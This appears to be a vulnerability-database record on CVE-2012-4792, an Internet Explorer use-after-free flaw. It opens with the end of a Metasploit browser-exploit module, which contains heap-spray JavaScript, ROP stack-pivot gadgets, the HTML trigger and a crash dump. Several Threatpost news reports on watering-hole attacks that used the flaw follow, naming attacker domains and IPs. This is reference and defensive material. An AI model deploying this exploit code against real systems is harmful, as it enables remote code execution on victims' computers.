\nif (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name)) \nprint_status(\"Target selected as: #{t.name}\") \nreturn t \nend \nend \n \nreturn nil \nend \n \ndef ie_heap_spray(my_target, p) \njs_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) \njs_nops = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4), Rex::Arch.endian(target.arch)) \n \n# Land the payload at 0x0c0c0b30 \njs = %Q| \nvar heap_obj = new heapLib.ie(0x20000); \nvar code = unescape(\"#{js_code}\"); \nvar nops = unescape(\"#{js_nops}\"); \nwhile (nops.length < 0x80000) nops += nops; \nvar offset = nops.substring(0, #{my_target['Offset']}); \nvar shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); \nwhile (shellcode.length < 0x40000) shellcode += shellcode; \nvar block = shellcode.substring(0, (0x80000-6)/2); \nheap_obj.gc(); \nfor (var i=1; i < 0x300; i++) { \nheap_obj.alloc(block); \n} \n| \n \njs = heaplib(js, {:noobfu => true}) \n \nif datastore['OBFUSCATE'] \njs = ::Rex::Exploitation::JSObfu.new(js) \njs.obfuscate \nend \n \nreturn js \nend \n \ndef get_payload(t, cli) \ncode = payload.encoded \n \n# No rop. Just return the payload. \nreturn code if t['Rop'].nil? \n \n=begin \nStack Pivoting to eax: \n0:008> db eax \n0c0c0b30 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................ \n0c0c0b40 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................ \n=end \n# Both ROP chains generated by mona.py - See corelan.be \ncase t['Rop'] \nwhen :msvcrt \nprint_status(\"Using msvcrt ROP\") \nif t.name =~ /Windows XP/ \nstack_pivot = [0x77c15ed6].pack(\"V\") * 54 # ret \nstack_pivot << [0x77c2362c].pack(\"V\") # pop ebx, #ret \nstack_pivot << [0x77c15ed5].pack(\"V\") # xchg eax,esp # ret # 0x0c0c0c0c \nrop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'}) \nelse \nstack_pivot = [0x77bcba5f].pack(\"V\") * 54 # ret \nstack_pivot << [0x77bb4158].pack(\"V\") # pop ebx, #ret \nstack_pivot << [0x77bcba5e].pack(\"V\") # xchg eax,esp # ret # 0x0c0c0c0c \nrop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'2003'}) \nend \nelse \nprint_status(\"Using JRE ROP\") \nstack_pivot = [0x7c348b06].pack(\"V\") * 54 # ret \nstack_pivot << [0x7c341748].pack(\"V\") # pop ebx, #ret \nstack_pivot << [0x7c348b05].pack(\"V\") # xchg eax,esp # ret # 0x0c0c0c0c \nrop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot}) \nend \n \nreturn rop_payload \nend \n \ndef load_exploit_html(my_target, cli) \n \np = get_payload(my_target, cli) \njs = ie_heap_spray(my_target, p) \n \nhtml = %Q| \n<!doctype html> \n<html> \n<head> \n<script> \n#{js} \n \nfunction exploit() \n{ \nvar e0 = null; \nvar e1 = null; \nvar e2 = null; \nvar arrObject = new Array(3000); \nvar elmObject = new Array(500); \nfor (var i = 0; i < arrObject.length; i++) \n{ \narrObject[i] = document.createElement('div'); \narrObject[i].className = unescape(\"ababababababababababababababababababababa\"); \n} \n \nfor (var i = 0; i < arrObject.length; i += 2) \n{ \narrObject[i].className = null; \n} \n \nCollectGarbage(); \n \nfor (var i = 0; i < elmObject.length; i ++) \n{ \nelmObject[i] = document.createElement('button'); \n} \n \nfor (var i = 1; i < arrObject.length; i += 2) \n{ \narrObject[i].className = null; \n} \n \nCollectGarbage(); \n \ntry { \ne0 = document.getElementById(\"a\"); \ne1 = document.getElementById(\"b\"); \ne2 = document.createElement(\"q\"); \ne1.applyElement(e2); \ne1.appendChild(document.createElement('button')); \ne1.applyElement(e0); \ne2.outerText = \"\"; \ne2.appendChild(document.createElement('body')); \n} catch(e) { } \nCollectGarbage(); \nfor(var i =0; i < 20; i++) \n{ \narrObject[i].className = unescape(\"ababababababababababababababababababababa\"); \n} \nvar eip = window; \nvar data = \"#{Rex::Text.rand_text_alpha(41)}\"; \neip.location = unescape(\"%u0b30%u0c0c\" + data); \n \n} \n \n</script> \n</head> \n<body onload=\"eval(exploit())\"> \n<form id=\"a\"> \n</form> \n<dfn id=\"b\"> \n</dfn> \n</body> \n</html> \n| \n \nreturn html \nend \n \ndef on_request_uri(cli, request) \nagent = request.headers['User-Agent'] \nuri = request.uri \nprint_status(\"Requesting: #{uri}\") \n \nmy_target = get_target(agent) \n# Avoid the attack if no suitable target found \nif my_target.nil? \nprint_error(\"Browser not supported, sending 404: #{agent}\") \nsend_not_found(cli) \nreturn \nend \n \nhtml = load_exploit_html(my_target, cli) \nhtml = html.gsub(/^\\t\\t/, '') \nprint_status(\"Sending HTML...\") \nsend_response(cli, html, {'Content-Type'=>'text/html'}) \nend \n \nend \n \n \n=begin \n(87c.f40): Access violation - code c0000005 (first chance) \nFirst chance exceptions are reported before any exception handling. \nThis exception may be expected and handled. \neax=12120d0c ebx=0023c218 ecx=00000052 edx=00000000 esi=00000000 edi=0301e400 \neip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na pe nc \ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 \nmshtml!CMarkup::OnLoadStatusDone+0x504: \n637848c3 ff90dc000000 call dword ptr <Unloaded_Ed20.dll>+0xdb (000000dc)[eax] ds:0023:12120de8=???????? \n0:008> k \nChildEBP RetAddr \n020bf8a4 635c378b mshtml!CMarkup::OnLoadStatusDone+0x504 \n020bf8c4 635c3e16 mshtml!CMarkup::OnLoadStatus+0x47 \n020bfd10 636553f8 mshtml!CProgSink::DoUpdate+0x52f \n020bfd24 6364de62 mshtml!CProgSink::OnMethodCall+0x12 \n020bfd58 6363c3c5 mshtml!GlobalWndOnMethodCall+0xfb \n020bfd78 7e418734 mshtml!GlobalWndProc+0x183 \n020bfda4 7e418816 USER32!InternalCallWinProc+0x28 \n020bfe0c 7e4189cd USER32!UserCallWinProcCheckWow+0x150 \n020bfe6c 7e418a10 USER32!DispatchMessageWorker+0x306 \n020bfe7c 01252ec9 USER32!DispatchMessageW+0xf \n020bfeec 011f48bf IEFRAME!CTabWindow::_TabWindowThreadProc+0x461 \n020bffa4 5de05a60 IEFRAME!LCIETab_ThreadProc+0x2c1 \n020bffb4 7c80b713 iertutil!CIsoScope::RegisterThread+0xab \n020bffec 00000000 kernel32!BaseThreadStart+0x37 \n \n0:008> r \neax=0c0c0c0c ebx=0023c1d0 ecx=00000052 edx=00000000 esi=00000000 edi=033e9120 \neip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na po nc \ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 \nmshtml!CMarkup::OnLoadStatusDone+0x504: \n637848c3 ff90dc000000 call dword ptr [eax+0DCh] ds:0023:0c0c0ce8=???????? \n \n=end`\n", "sourceHref": "https://packetstormsecurity.com/files/download/119168/ie_cdwnbindinfo_uaf.rb.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2018-10-06T23:01:36", "bulletinFamily": "info", "description": "Internet Explorer users, exposed to a zero-day vulnerability in the browser and a faulty temporary Fix It from Microsoft, finally got some relief today when the company, as promised, released an out-of-band patch.\n\nMeanwhile, a handful of new telco, manufacturing and human rights sites have been infected and have been serving exploits since the public release of the zero-day, a researcher told Threatpost.\n\nThe [IE security update](<http://technet.microsoft.com/en-us/security/bulletin/ms13-008>) repairs previously unreported flaws in IE 6-8 exploited in [watering hole attacks](<https://threatpost.com/council-foreign-relations-website-hit-watering-hole-attack-ie-zero-day-exploit-122912/>) against government and manufacturing websites worldwide.\n\nExploits were active against IE 8 only, but previous versions also contained the same use-after free vulnerability. Sites visited by high-value targets were compromised and serving exploits via drive-by download attacks. An attacker would then gain the same privileges as a user and be able to execute code remotely on a vulnerable computer.\n\nThe vulnerability was reported shortly after Christmas Day when it was discovered that the Council on Foreign Relations website had been compromised and serving malware for close to a month. Soon thereafter, Capstone Turbine Co., a power equipment manufacturer for utilities, was also serving malware as were [political, social and human rights websites in Russia, China and Hong Kong](<https://threatpost.com/ie-zero-day-watering-hole-attack-expands-handful-political-sites-010313/>).\n\nResearcher Eric Romang said that since, he has seen more sites hosting exploits including an Australian telco provider, a US service provider and a US importer of used Japanese auto parts.\n\n\u201cAfter the public release of the zero day, two different variants of the zero day have been found exploited in targeted attacks against human rights activists, a Japanese tourism agency and a Taiwan petrochemical company,\u201d Romang said.\n\n[CVE-2012-4792](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4792>) is a memory corruption issue in IE that occurs when the browser accesses an object in memory that has not been initialized or has been deleted, it may corrupt memory and the attacker would have control of the machine.\n\nThe CFR attack cast the first attention on the zero day, which Romang said began as early as Dec. 7. Symantec has linked these attacks to the [Elderwood group](<https://threatpost.com/out-band-ie-patch-released-more-sites-attacked-011413/>), the same group said to be behind the 2009 Aurora attacks on Google. Attackers planted a malicious Adobe Flash file on the CFR site which kicked off a heap spray attack against IE, exploiting the vulnerability. The Javascript would check the Windows language first, and if sent to English, Chinese, Japanese, Korean, or Russia, would execute. It also checked cookies in order to deliver the attack only once.\n\nMicrosoft was quick to offer temporary workarounds and mitigations, including a Fix It. The stop-gap was short-lived, however, as security company Exodus Intelligence reported Jan. 4 it had [bypassed the Fix It](<https://threatpost.com/researchers-bypass-microsoft-fix-it-ie-zero-day-010413/>). Exodus VP of Intelligence Brandon Edwards told Threatpost did cover paths used by the known exploits, but not all the ways the vulnerability could be reached.\n\nA source said Microsoft was able to take the details provided by Exodus and confirm the Fix It could be bypassed; Exodus did not provide full source code for its proof of concept to Microsoft, it only does so for its customers.\n\nPast watering hole attacks have been linked to nation states, including China. They are intelligence-driven and target sites frequented by influential people\u2014the real targets of the attacks. Attackers inject malicious files onto websites hoping to snare people with an interest in the site\u2019s focus. These types of attacks are not only effective, but are more economical than targeted attacks that start with a phishing email.\n\nMicrosoft continues to call the impact of the attacks limited. IE 8 installations, meanwhile, account for the majority of enterprise market share, followed by IE 7 and 6. IE 9 and 10 are not vulnerable, Microsoft said.\n\nIn the meantime, users are urged to apply the IE patch immediately.\n\n\u201cPlease note that this update is a real patch and not a cumulative update as we are used to for typical Internet Explorer updates,\u201d said Wolfgang Kandek, CTO at Qualys. \u201cIt is highly recommended to have [MS12-077, the last cumulative Internet Explorer update](<http://technet.microsoft.com/en-us/security/bulletin/ms12-077>), installed before applying MS13-008.\u201d\n", "modified": "2013-05-10T14:29:20", "published": "2013-01-14T20:29:58", "id": "THREATPOST:39F4459D592F1F044F7A11772E4B8ACE", "href": "https://threatpost.com/out-band-ie-patch-released-more-sites-attacked-011413/77403/", "type": "threatpost", "title": "Out-of-Band IE Patch Released as More Sites Attacked", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:51", "bulletinFamily": "info", "description": "The United States Department of Labor website is the latest high-profile government site to fall victim to a watering hole attack. Researchers at a number of security companies reported today that the site was hosting malware and redirecting visitors to a site hosting the Poison Ivy remote access Trojan.\n\nThe malware has since been removed and law enforcement is investigating.\n\nThe attackers inserted javascript onto the DoL\u2019s Site Exposure Matrices (SEM) website that sent visitors to another site hosting an exploit for [CVE 2012-4792](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4792>) targeting Windows XP users running Internet Explorer versions 6-8. The vulnerability, a user-after free memory vulnerability in the browser, enables attackers to remotely run code on a compromised machine. This has been exploited in the wild since December and was [patched earlier this year by Microsoft](<http://threatpost.com/out-band-ie-patch-released-more-sites-attacked-011413/>).\n\n\u201cThis profile fits the enterprise user machine profile typical of large enterprise and government agencies,\u201d said Invincea founder and CEO Anup Ghosh.\n\nThe DoL\u2019s SEM site is a repository of data on toxic substances present at facilities run by the Department of Energy.\n\nThe malware drops an executable called conime[.]exe onto the infected computer and opens remote connections on ports 443 and 53, Invincea said, adding there were two redirects present on the DoL page sending visitors to dol[.]ns01[.]us. Once the user is redirected, a file is executed, ports are opened and registry changes are made to maintain persistence on the machine. Ghosh said that one of the command and control servers had already been blacklisted by Google.\n\nAlien Vault Lab manager Jaime Blasco said the attacker also collects a bit of system information including whether a number of antivirus programs, Flash, Java, and Microsoft Office are running, and sends that data to the remote server. Blasco added that the command and control protocol used in the attack matches that of a Chinese espionage gang known as DeepPanda; other characteristics of this attack match those used against a Thai human rights nongovernment organization website.\n\n[Watering hole attacks](<http://threatpost.com/why-watering-hole-attacks-work-032013/>) have been used primarily by state-sponsored attackers to spy on rival governments, dissident citizen groups and manufacturing organizations. Rather than rely on spear phishing, attackers infect websites of common interest to their targets, generally with javascript via an iframe that redirects the victim to a site hosting espionage malware. Some high-profile watering hole attacks have been carried out this year against the [Council on Foreign Relations website](<http://threatpost.com/council-foreign-relations-website-hit-watering-hole-attack-ie-zero-day-exploit-122912/>) and a [popular iOS mobile developer forum](<http://threatpost.com/ios-developer-site-core-facebook-apple-watering-hole-attack-022013/>) that snared a number of victims at Facebook, Apple and Twitter.\n\nIn this case, it\u2019s likely the targets were Department of Labor employees and other federal employees tied to the DoL and Department of Energy.\n\n\u201cIt is important to note that most websites are vulnerable to exploit. As a result, exploiting legitimate websites have become a common vector for penetrating enterprise networks and individual machines,\u201d Ghosh said. \u201cThe Department of Labor is no exception.\u201d\n", "modified": "2013-07-02T18:18:20", "published": "2013-05-01T16:30:58", "id": "THREATPOST:37FD3A8A338F59D00D9F7966AFF5067F", "href": "https://threatpost.com/watering-hole-attack-claims-us-department-of-labor-website/100081/", "type": "threatpost", "title": "Watering Hole Attack Hits US Department of Labor Website", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:51", "bulletinFamily": "info", "description": "The scope of a [watering hole attack targeting the U.S. Department of Labor website](<http://threatpost.com/watering-hole-attack-claims-us-department-of-labor-website/>) widened significantly over the weekend. Researchers are reporting that as many as nine websites, including a European aerospace, defense and security manufacturer as well as a number of non-profit organizations have also been compromised and are redirecting visitors to a website hosting malware.\n\nMicrosoft, meanwhile, released an [advisory](<http://technet.microsoft.com/en-us/security/advisory/2847140>) warning Internet Explorer 8 users that the attackers are exploiting a zero-day vulnerability in Internet Explorer 8, and [not CVE-2012-4792](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4792>) as originally was reported. Yesterday morning, a [Metasploit module](<https://community.rapid7.com/community/metasploit/blog/2013/05/05/department-of-labor-ie-0day-now-available-at-metasploit>) was released for this vulnerability, heightening the likelihood of additional attacks or inclusion into a commercial or private exploit kit.\n\nMicrosoft urges IE 8 users to upgrade to a newer version of the browser\u2014IE 6, 7, 9 and 10 are not vulnerable\u2014and that it will either release an out-of-band patch or address the flaw in an upcoming Patch Tuesday release. The next scheduled Microsoft security updates are next week.\n\nThe original outbreak was made public May 1 when it was reported that the DoL\u2019s Site Exposure Matrices website was infected and attackers had injected javascript via an iFrame that redirected site visitors to a site hosting the Poison Ivy remote access Trojan.\n\nThe espionage malware was originally thought to be exploiting a use-after free memory corruption vulnerability that Microsoft had patched earlier this year. The DoL\u2019s SEM site is a repository of data on toxic substances present at facilities run by the Department of Energy, and researchers at Invincea speculated that the attackers\u2019 targets were downstream employees of the Department of Energy who work on nuclear weapons programs.\n\nInvincea CTO and founder Anup Ghosh confirmed that a [previously unreported use-after free vulnerability](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1347>) was being exploited in this attack and that only IE 8 was affected. Ghosh said his researchers were still able to [reproduce an infection](<http://www.invincea.com/2013/05/part-2-us-dept-labor-watering-hole-pushing-poison-ivy-via-ie8-zero-day/>) on a Windows XP machine running Windows 8 that was patched with MS13-008 that addressed CVE-2012-4792.\n\nMicrosoft confirmed in its advisory that this is a remote code execution vulnerability, and that IE does not properly handle objects in memory that have been deleted or not properly allocated. Microsoft suggests that users take caution when sent links via email or IM messages. In the meantime, Microsoft suggests setting Internet and local intranet security zones to \u201chigh\u201d to block ActiveX Controls and Scripting, as well as to configure IE to prompt before running Active Scripting.\n\nThe malware drops an executable called conime[.]exe onto the infected computer and opens remote connections on ports 443 and 53, Invincea said, adding there were two redirects present on the DoL page sending visitors to dol[.]ns01[.]us. Once the user is redirected, a file is executed, ports are opened and registry changes are made to maintain persistence on the machine. Ghosh said that one of the command and control servers had already been blacklisted by Google.\n\nAlien Vault Lab manager Jaime Blasco said that researchers had detected [redirects to another server](<http://labs.alienvault.com/labs/index.php/2013/new-internet-explorer-zeroday-was-used-in-the-dol-watering-hole-campaign/>) at sellagreement[.]com. That domain was also serving some of the malicious payloads found on dol[.]ns01[.]us. Blasco recommends checking logs for connections to either of those domains.\n\nFrom the initial analysis of the javascript on the DoL site, it collects system information checking for a number of antimalware programs, as well as third-party software such as Flash and Java, likely in order to launch further exploits. Blasco added that the command and control protocol used in the attack matches that of a Chinese espionage gang known as DeepPanda; other characteristics of this attack match those used against a Thai human rights nongovernment organization website.\n\nThe Poison Ivy RAT, meanwhile, is a backdoor that an attacker can use to remotely access compromised machines and add or delete files, edit Registry files, view or kill running processes, network connections and services, and add or delete applications. It can be used for espionage as well as some variants have the capability to start remote command shells, take screenshots, start audio or video recordings and drop keylogging software.\n", "modified": "2013-07-02T19:25:28", "published": "2013-05-06T11:14:47", "id": "THREATPOST:E22638A2E1CC5775D0EA1AF91EFFF450", "href": "https://threatpost.com/ie-8-zero-day-found-as-dol-watering-hole-attack-spreads-to-nine-other-sites/100212/", "type": "threatpost", "title": "IE 8 Zero Day Widens Scope of DoL Watering Hole Attack", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:09", "bulletinFamily": "info", "description": "Researchers at Kaspersky Lab and CrySys Lab have discovered files buried inside a MiniDuke command and control server that indicate the presence of a Web-based facet of the campaign that initially targeted government agencies, primarily in Europe.\n\nUsers are likely lured to the malicious webpages via spear phishing messages containing a link to the attack site. The site, which remains active, is serving exploits for patched vulnerabilities in Java and Internet Explorer, researcher Igor Soumenkov wrote on the [Securelist](<http://www.securelist.com/en/blog/208194159/Miniduke_web_based_infection_vector>) blog today.\n\nSoumenkov said the attack site hosts a pair of frames, one that loads a webpage from a legitimate organization involved in the rebuilding and modernization of Iraq. In addition to the decoy page, a malicious page acts as a \u201cprimitive exploit pack,\u201d Soumenkov said, determining the browser used to visit the attack site and then serves the appropriate exploit. Data collected is also sent to the attacker\u2019s server.[](<https://threatpost.com/new-web-based-miniduke-components-discovered-031113/>)\n\n\u201cThe exploits are located in separate webpages,\u201d Soumenkov wrote. \u201cClients using Internet Explorer version 8 are served with about.htm, for other versions of the browser and for any other browser capable of running Java applets, the javascript code loads JavaApplet.html.\u201d\n\nThe Java file loads a Java class file that exploits [CVE-2013-0422](<https://threatpost.com/nasty-new-java-zero-day-found-exploit-kits-already-have-it-011013/>), a vulnerability affecting Java 7u10 and older that bypasses the built-in sandbox in Java to allow remote code execution. Soumenkov said the exploit is coded slightly differently than others exploiting this vulnerability, including the Metasploit module, likely to avoid detection by security software. Oracle patched this vulnerability on Jan. 13; the applet was uploaded on Feb. 11, Soumenkov said.\n\nOnce the Java shellcode is executed, it launches an encrypted DLL and writes it to a temporary Java directory with the name ntuser.bin. It then copies the rundll.32.exe system file to the same directory along with another executable that loads the main module of Miniduke.\n\nMiniduke then reaches out to a pre-seeded Twitter post hosting a URL connecting it to the command and control server to download further instructions.\n\nThe IE 8 exploit behaves similarly, but exploits [CVE-2012-4792](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4792>), which was [patched in December by Microsoft](<https://threatpost.com/out-band-ie-patch-released-more-sites-attacked-011413/>). A Metasploit module was released Dec. 29 and the [Microsoft Security Update MS13-008](<http://technet.microsoft.com/en-us/security/bulletin/ms13-008>) on Jan. 14. Like its Java counterpart, this exploit page was uploaded Feb. 11.\n\nThe shellcode used in the IE attack downloads a GIF image from the command and control server then decrypts the portable executable file hidden in the image.\n\n\u201cThe PE file also appeared to be a modification of the Miniduke\u2019s main backdoor module that uses the same Twitter URL as the Java payload,\u201d Sumenkov wrote.\n\nMiniDuke surfaced on Feb. 27 and originally were thought to be just a phishing campaign where targets were emailed malicious PDF files pretending to be Ukraine\u2019s foreign policy and NATO membership plans, as well as information for a phony human rights seminar. The PDF attacks targeted CVE-2013-0640, an Adobe Reader vulnerability that had been patched a week earlier. Attackers were able to cope and move files, create new directories, kill processes and install additional malware. MiniDuke was the second successful Reader sandbox bypass.\n\nMiniDuke stood out for researchers for its use of steganography to hide custom backdoor code, as well as using Twitter to reach URLs pointing to command and control servers. Another unique feature of MiniDuke was its use of a small downloader written in an old-school Assembler language used to gather system information unique to the compromised machine.\n\n\u201cThis is a unique and very strange attack. The many different targets hit in separate countries, together with the high profile appearance of the decoy documents and the weird backdoor functionality indicate an unusual threat actor,\u201d said the original Kaspersky and CrySyS report. \u201cSome of the elements remind us of both Duqu and Red October, such as the minimalistic approach, hacked servers, encrypted channels but also the typology of the victims.\u201d\n", "modified": "2013-05-08T14:19:31", "published": "2013-03-11T16:29:10", "id": "THREATPOST:5881049DF0819D9F1F2AEFE35F853C68", "href": "https://threatpost.com/new-web-based-miniduke-components-discovered-031113/77610/", "type": "threatpost", "title": "New Web-Based MiniDuke Components Discovered", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:31", "bulletinFamily": "info", "description": "[](<https://threatpost.com/attackers-exploit-java-compromises-reporters-without-borders-site-012313/>)The [Java saga](<https://threatpost.com/its-time-abandon-java-012113/>) continued when unknown, and apparently well concealed goons exploited recent Java and Internet Explorer zero-days to compromise the website of the French-based, free-press advocacy group, Reporters Without Borders. The attack, which attempted to take advantage of the time-gulf that separates Oracle\u2019s patch release from their users\u2019 application of it, is part of a [watering hole campaign](<https://threatpost.com/council-foreign-relations-website-hit-watering-hole-attack-ie-zero-day-exploit-122912/>) also targeting [Tibetan](<https://threatpost.com/new-trojan-mac-used-attacks-tibetan-ngos-032112/>) and Uygur human rights groups as well as Hong Kong and Taiwanese political parties and other non-governmental organizations.\n\n[Writing on the Avast Security blog](<https://blog.avast.com/2013/01/22/reporters-without-borders-website-misused-in-wateringhole-attack/>), Jindrich Kubec claims it is safe to assume that China is behind these attacks. Kubec\u2019s assertion appears to be based, at least in part, on the reality that visitors to the [watering hole](<https://threatpost.com/ie-zero-day-watering-hole-attack-expands-handful-political-sites-010313/>) sites (and the sites themselves for that matter), are, for lack of a better way to put it, individuals, organizations, and political entities that the People\u2019s Republic publically does not like.\n\nThe watering hole attack is a social engineering technique whereby attackers attempt to compromise websites that are not directly or officially related to their intended targets but which they believe members of an intended target organization are likely to visit.\n\nAccording to the Avast report, the attackers used the recent Internet Explorer and Java vulnerabilities, identified as CVE-2012-4792 and CVE-2013-0422 respectively. Microsoft resolved the IE bug with [MS13-008](<https://threatpost.com/out-band-ie-patch-released-more-sites-attacked-011413/>) and Oracle fixed theirs with [Java 7 update 11](<https://threatpost.com/newest-java-7-update-still-exploitable-researcher-says-090412/>).\n\nIn the end, if the exploits succeed they will infect victim machines with either a [remote access trojan](<https://threatpost.com/fakem-rat-mimics-normal-network-traffic-011813/>) that phones home to the Singapore-based \u201cluckmevnc.myvnc.com\u201d (IP address 112.140.186.252) or an injector that flashes a fake error page while downloading a similar remote access tool that communicates with the Hong Kong-based \u201cd.wt.ikwb.com\u201d (58.64.179.139).\n\nAn English version of the Reporters Without Borders site contained a suspicious jacvascript inclusion. That inclusion creates a cookie called \u201csomethingbbbbb\u201d designed to expire after one day. The same cookie was used in similar attacks a few years ago and Kubec believes it could be related to the legitimate m.js cookie, \u201csomethingeeee,\u201d used by a Honk Kong political party.\n\nKubec also determined that an iframe from hxxp://newsite.acmetoy.com/m/d/pdf.html targeted users visiting the site in IE 8. There were an additional two iframes, hxxp://newsite.acmetoy.com/m/d/pdf.html and hxxp://newsite.acmetoy.com/m/d/javapdf.html reserved for those that visited the site on a browser other than IE.\n\nAccording to Kubec\u2019s analysis of newsite.acmetoy.com, a number of files relating to the IE exploit listed above, including a DOITYOUR obfuscated Javascript file which attempts to exploit the latest Internet Explorer vulnerability as well as DOITYOUR variants of \u201ctoday.swf,\u201d \u201cnews.html,\u201d and \u201crobots.txt.\u201d\n\nThe site also attempted to exploit at least one other Java vulnerability from back in 2011 as well (CVE-2011-3544) and contained the related files, \u201cjavapdf.html,\u201d a javascript file for both vulnerabilities, \u201cAppletHigh.jar,\u201d a CVE-2013-0422 exploit, and \u201cAppletLow.jar,\u201d a CVE-2011-3544 exploit.\n\nIn an analysis of other site (98.129.194.210), Kubec found that it contained the same malicious Java-related content and reasons that it probably serves as a backup to the first in the event of a takedown.\n\nAvast said it notified Reporters Without Borders.\n", "modified": "2013-05-13T18:47:05", "published": "2013-01-23T18:53:02", "id": "THREATPOST:D28B11CA5BD698B7DBA755347444B7A2", "href": "https://threatpost.com/attackers-exploit-java-compromises-reporters-without-borders-site-012313/77443/", "type": "threatpost", "title": "Attackers Exploit Java, Compromise Reporters Without Borders Site", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:38", "bulletinFamily": "info", "description": "Expect amped up pressure aimed in Microsoft\u2019s direction for a patch for the Internet Explorer zero day that surfaced last week, now that researchers at Exodus Intelligence reported today they have developed a bypass for the Fix It that Microsoft released as a temporary mitigation.\n\nTheir new exploit beat a fully patched Windows system running IE 8, the same version of the browser exploited by malware used in [watering hole attacks](<https://threatpost.com/council-foreign-relations-website-hit-watering-hole-attack-ie-zero-day-exploit-122912/>) against a number of political and manufacturing websites, including the Council on Foreign Relations in the U.S., and Chinese human rights site Uygur Haber Ajanski.\n\nIE 6 and 7 also hold the same [use-after free memory vulnerability (CVE-2012-4792)](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4792>) but are currently not being exploited. Microsoft said the impact of the attacks is limited; IE 9 and 10 are not vulnerable, Microsoft said. Yesterday\u2019s [Patch Tuesday advisory](<https://threatpost.com/patch-ie-zero-day-wont-be-among-microsoft-security-updates-next-week-010313/>) previewing next Tuesday\u2019s batch of security updates did not include an IE patch.[](<https://threatpost.com/researchers-bypass-microsoft-fix-it-ie-zero-day-010413/>)\n\nBrandon Edwards, VP of Intelligence at Exodus, said his firm\u2019s researchers looked at the Fix It to determine how much of the vulnerability it prevented. \u201cUsually, there are multiple paths one can take to trigger or exploit a vulnerability,\u201d Edwards said. \u201cThe Fix It did not prevent all those paths.\u201d\n\nThe Fix It, according to Microsoft, is an [appcompat shim](<http://blogs.technet.com/b/srd/archive/2012/12/29/new-vulnerability-affecting-internet-explorer-8-users.aspx>) that modifies in memory a particular function to always return NULL, resulting in a safe crash of the browser rather than allowing for remote code execution.\n\n\u201cIt comes down to clearly understanding the root cause and ways the browser can get to the affected code,\u201d Edwards said. \u201cThe Fix It covered paths used by the exploit, but not all the ways the vulnerability can be reached. A full patch should eliminate all those possibilities.\u201d\n\nIn the meantime, a handful of political, social and human rights sites in the U.S., Russia, China and Hong Kong have been infected and serving malware, for weeks in some cases, that exploits the IE zero day; as of yesterday, the [Uygur website was still serving an exploit](<https://threatpost.com/ie-zero-day-watering-hole-attack-expands-handful-political-sites-010313/>), researcher and Metaspoloit contributor Eric Romang said.\n\nMicrosoft has been informed of the Exodus Intelligence exploit; researchers at Exodus said they will not disclose details of their exploit until Microsoft addresses the vulnerability.\n\nEarlier this week, Exodus developed what it called a more [advanced exploit of the IE vulnerability](<http://blog.exodusintel.com/2013/01/02/happy-new-year-analysis-of-cve-2012-4792/>), which led them to look more closely at the Fix It. Unlike the original remote code injection exploit, this one does not require a heap spray to execute it. Peter Vreugdenhil said they were able to take advantage of IE8\u2019s support for HTML+TIME, which is no longer supported in more current versions of the browser. The researchers were able to create an array with pointers to strings they controlled, he said, enabling them to control system calls without a heap spray.\n\n\u201cI used some new and/or non-public techniques to get a reliable exploit that doesn\u2019t require heap spray, but all in all this bug can be exploited quite reliably,\u201d Vreugdenhil said in a blogpost.\n\nSymantec, meanwhile, yesterday attributed the attacks to the [Elderwood Project](<https://threatpost.com/elderwood-crew-tied-google-aurora-attack-targeting-defense-energy-finance-companies-090712/>), which has been responsible for a number of Microsoft zero days in 2012, including an attack in May against Amnesty International\u2019s Hong Kong site targeting [CVE-2012-1875](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1875>), and several defense-related sites discovered in September to be hosting malware targeting [CVE-2012-4969](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4969>). [Symantec then tied the latest IE zero- day to the group](<https://threatpost.com/researchers-bypass-microsoft-fix-it-ie-zero-day-010413/>) after concluding that the Council of Foreign Relations and Capstone Turbine Corp. websites were hosting the same malicious Shockwave file.\n\n\u201cAll the samples we identified include a function named HeapSpary. HeapSpary is a clear mistyping of Heap Spray, a common attack step used in vulnerability exploitation,\u201d Symantec wrote in a [blogpost](<https://threatpost.com/researchers-bypass-microsoft-fix-it-ie-zero-day-010413/>). 